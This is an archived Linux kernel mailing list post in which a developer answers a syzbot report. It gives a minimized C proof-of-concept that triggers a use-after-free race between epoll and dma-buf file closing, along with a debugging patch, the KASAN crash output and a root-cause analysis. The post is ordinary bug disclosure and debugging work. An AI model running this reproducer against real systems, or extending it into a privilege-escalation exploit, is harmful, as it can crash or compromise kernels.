| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Fri, 3 May 2024 18:54:22 +0700
From: Bui Quang Minh <minhquangbui99@...il.com>
To: syzbot <syzbot+045b454ab35fd82a35fb@...kaller.appspotmail.com>,
axboe@...nel.dk, brauner@...nel.org, io-uring@...r.kernel.org, jack@...e.cz,
linux-fsdevel@...r.kernel.org, linux-kernel@...r.kernel.org,
syzkaller-bugs@...glegroups.com, viro@...iv.linux.org.uk
Cc: Sumit Semwal <sumit.semwal@...aro.org>,
Christian König <christian.koenig@....com>,
linux-media@...r.kernel.org, dri-devel@...ts.freedesktop.org,
linaro-mm-sig@...ts.linaro.org, linux-kernel@...r.kernel.org,
Laura Abbott <laura@...bott.name>, Kees Cook <keescook@...omium.org>
Subject: Re: [syzbot] [fs?] [io-uring?] general protection fault in
__ep_remove
Hi everyone,
I've tried to debug this syzkaller's bug report
Here is my minimized proof-of-concept
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <sys/epoll.h>
#include <linux/udmabuf.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <pthread.h>
#include <sys/ioctl.h>
#define err_msg(msg) do {perror(msg); exit(1);} while(0)
void *close_thread(void *arg)
{
int fd = (int) (long) arg;
close(fd);
}
int main()
{
int fd, dmabuf_fd, memfd, epoll_fd, ret;
struct udmabuf_create dmabuf_arg = {};
struct epoll_event event = {
.events = EPOLLIN | EPOLLOUT,
};
pthread_t thread;
memfd = memfd_create("test", MFD_ALLOW_SEALING);
if (memfd < 0)
err_msg("memfd-create");
if (ftruncate(memfd, 0x1000) < 0)
err_msg("ftruncate");
ret = fcntl(memfd, F_ADD_SEALS, F_SEAL_SHRINK);
if (ret < 0)
err_msg("add-seal");
fd = open("/dev/udmabuf", O_RDWR);
if (fd < 0)
err_msg("open");
dmabuf_arg.memfd = memfd;
dmabuf_arg.size = 0x1000;
dmabuf_fd = ioctl(fd, UDMABUF_CREATE, &dmabuf_arg);
if (dmabuf_fd < 0)
err_msg("ioctl-udmabuf");
epoll_fd = epoll_create(10);
if (epoll_fd < 0)
err_msg("epoll-create");
ret = epoll_ctl(epoll_fd, EPOLL_CTL_ADD, dmabuf_fd, &event);
if (ret < 0)
err_msg("epoll-ctl-add");
pthread_create(&thread, NULL, close_thread, (void *) (long) dmabuf_fd);
epoll_wait(epoll_fd, &event, 1, -1);
return 0;
}
When running the above proof-of-concept on Linux 6.9.0-rc6 with KASAN
and the
following patch for easier reproducible, I got the KASAN bug report
diff --git a/drivers/dma-buf/dma-buf.c b/drivers/dma-buf/dma-buf.c
index 8fe5aa67b167..de3463e7d47b 100644
--- a/drivers/dma-buf/dma-buf.c
+++ b/drivers/dma-buf/dma-buf.c
@@ -27,6 +27,7 @@
#include <linux/mm.h>
#include <linux/mount.h>
#include <linux/pseudo_fs.h>
+#include <linux/delay.h>
#include <uapi/linux/dma-buf.h>
#include <uapi/linux/magic.h>
@@ -240,6 +241,7 @@ static __poll_t dma_buf_poll(struct file *file,
poll_table *poll)
struct dma_resv *resv;
__poll_t events;
+ mdelay(1000);
dmabuf = file->private_data;
if (!dmabuf || !dmabuf->resv)
return EPOLLERR;
> while true; do ./mypoc_v2; done
==================================================================
BUG: KASAN: slab-use-after-free in __fput+0x164/0x523
Read of size 8 at addr ffff88800051e830 by task mypoc_v2/402
CPU: 0 PID: 402 Comm: mypoc_v2 Not tainted 6.9.0-rc5+ #11
Call Trace:
<TASK>
dump_stack_lvl+0x49/0x65
? __fput+0x164/0x523
print_report+0x170/0x4c2
? __virt_addr_valid+0x21b/0x22c
? kmem_cache_debug_flags+0xc/0x1d
? __fput+0x164/0x523
kasan_report+0xae/0xd5
? __fput+0x164/0x523
__fput+0x164/0x523
? __pfx___schedule+0x10/0x10
task_work_run+0x16a/0x1bb
? __pfx_task_work_run+0x10/0x10
? __x64_sys_epoll_wait+0x107/0x143
resume_user_mode_work+0x21/0x44
syscall_exit_to_user_mode+0x5d/0x76
do_syscall_64+0xb5/0x107
entry_SYSCALL_64_after_hwframe+0x76/0x7e
RIP: 0033:0x44d99e
Code: 10 89 7c 24 0c 89 4c 24 1c e8 2e 8c 02 00 44 8b 54 24 1c 8b 54 24
18 41 89 c0 48 8b 74 24 10 8b 7c 24 0c b8 e8 00 00 00 0f 05 <48> 3d 00
f0 ff ff 77 32 44 89 c7 89 44 24 0c e8 6e 8c 02 00 8b 44
RSP: 002b:00007fffaec21770 EFLAGS: 00000293 ORIG_RAX: 00000000000000e8
RAX: 0000000000000001 RBX: 00007fffaec219e8 RCX: 000000000044d99e
RDX: 0000000000000001 RSI: 00007fffaec217c4 RDI: 0000000000000006
RBP: 00007fffaec217f0 R08: 0000000000000000 R09: 00007fffaec2167f
R10: 00000000ffffffff R11: 0000000000000293 R12: 0000000000000001
R13: 00007fffaec219d8 R14: 00000000004dc790 R15: 0000000000000001
</TASK>
Allocated by task 402:
kasan_save_stack+0x24/0x44
kasan_save_track+0x14/0x2d
__kasan_slab_alloc+0x47/0x55
kmem_cache_alloc_lru+0x12a/0x172
__d_alloc+0x2d/0x618
d_alloc_pseudo+0x14/0x8d
alloc_path_pseudo+0xa5/0x165
alloc_file_pseudo+0x7f/0x124
dma_buf_export+0x37f/0x894
udmabuf_create+0x53e/0x68c
udmabuf_ioctl+0x133/0x212
vfs_ioctl+0x7e/0x95
__do_sys_ioctl+0x51/0x78
do_syscall_64+0x9b/0x107
entry_SYSCALL_64_after_hwframe+0x76/0x7e
Freed by task 403:
kasan_save_stack+0x24/0x44
kasan_save_track+0x14/0x2d
kasan_save_free_info+0x3f/0x4d
poison_slab_object+0xcb/0xd8
__kasan_slab_free+0x19/0x38
kmem_cache_free+0xd6/0x136
__dentry_kill+0x22d/0x321
dput+0x3b/0x7f
__fput+0x4f1/0x523
__do_sys_close+0x59/0x87
do_syscall_64+0x9b/0x107
entry_SYSCALL_64_after_hwframe+0x76/0x7e
The buggy address belongs to the object at ffff88800051e800
which belongs to the cache dentry of size 192
The buggy address is located 48 bytes inside of
freed 192-byte region [ffff88800051e800, ffff88800051e8c0)
The buggy address belongs to the physical page:
page: refcount:1 mapcount:0 mapping:0000000000000000 index:0x0 pfn:0x51e
flags: 0x800(slab|zone=0)
page_type: 0xffffffff()
raw: 0000000000000800 ffff888000281780 ffffea0000013ec0 0000000000000002
raw: 0000000000000000 0000000080100010 00000001ffffffff 0000000000000000
page dumped because: kasan: bad access detected
Memory state around the buggy address:
ffff88800051e700: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
ffff88800051e780: 00 00 00 00 00 00 00 00 fc fc fc fc fc fc fc fc
>ffff88800051e800: fa fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb
^
ffff88800051e880: fb fb fb fb fb fb fb fb fc fc fc fc fc fc fc fc
ffff88800051e900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
==================================================================
Root cause:
AFAIK, eventpoll (epoll) does not increase the registered file's reference.
To ensure the safety, when the registered file is deallocated in __fput,
eventpoll_release is called to unregister the file from epoll. When calling
poll on epoll, epoll will loop through registered files and call vfs_poll on
these files. In the file's poll, file is guaranteed to be alive, however, as
epoll does not increase the registered file's reference, the file may be
dying
and it's not safe the get the file for later use. And dma_buf_poll violates
this. In the dma_buf_poll, it tries to get_file to use in the callback. This
leads to a race where the dmabuf->file can be fput twice.
Here is the race occurs in the above proof-of-concept
close(dmabuf->file)
__fput_sync (f_count == 1, last ref)
f_count-- (f_count == 0 now)
__fput
epoll_wait
vfs_poll(dmabuf->file)
get_file(dmabuf->file)(f_count == 1)
eventpoll_release
dmabuf->file deallocation
fput(dmabuf->file) (f_count == 1)
f_count--
dmabuf->file deallocation
I am not familiar with the dma_buf so I don't know the proper fix for the
issue. About the rule that don't get the file for later use in poll
callback of
file, I wonder if it is there when only select/poll exist or just after
epoll
appears.
I hope the analysis helps us to fix the issue.
Thanks,
Quang Minh.
Powered by blists - more mailing lists